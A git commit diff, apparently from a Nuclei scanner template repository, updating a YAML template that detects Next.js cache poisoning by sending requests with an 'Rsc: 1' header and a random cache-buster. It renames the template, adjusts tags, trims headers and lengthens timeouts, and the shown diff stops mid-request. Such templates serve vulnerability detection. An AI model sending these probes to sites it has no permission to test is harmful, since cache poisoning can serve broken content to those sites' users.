Update nextjs-rsc-cache.yaml

patch-4
Ritik Chaddha 2024-07-10 23:39:17 +05:30 committed by GitHub
parent 090c620238
commit e4b8efd1e1
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 4 additions and 8 deletions

View File

@ -1,7 +1,7 @@
id: nextjs-rsc-cache
info:
name: Next.js Cache Poisoning using RSC
name: Next.js - Cache Poisoning
author: DhiyaneshDk
severity: high
reference:
@ -15,7 +15,7 @@ info:
- http.html:"/_next/static"
- cpe:"cpe:2.3:a:zeit:next.js"
fofa-query: body="/_next/static"
tags: next-js,cache
tags: nextjs,cache
variables:
rand: "{{rand_text_numeric(5)}}"
@ -25,22 +25,18 @@ http:
- |
GET /?cb={{rand}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Priority: u=1
Rsc: 1
- |
@timeout: 5s
@timeout: 10s
GET /?cb={{rand}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Priority: u=1
Rsc: 1
- |
@timeout: 5s
@timeout: 10s
GET /?cb={{rand}} HTTP/1.1
Host: {{Hostname}}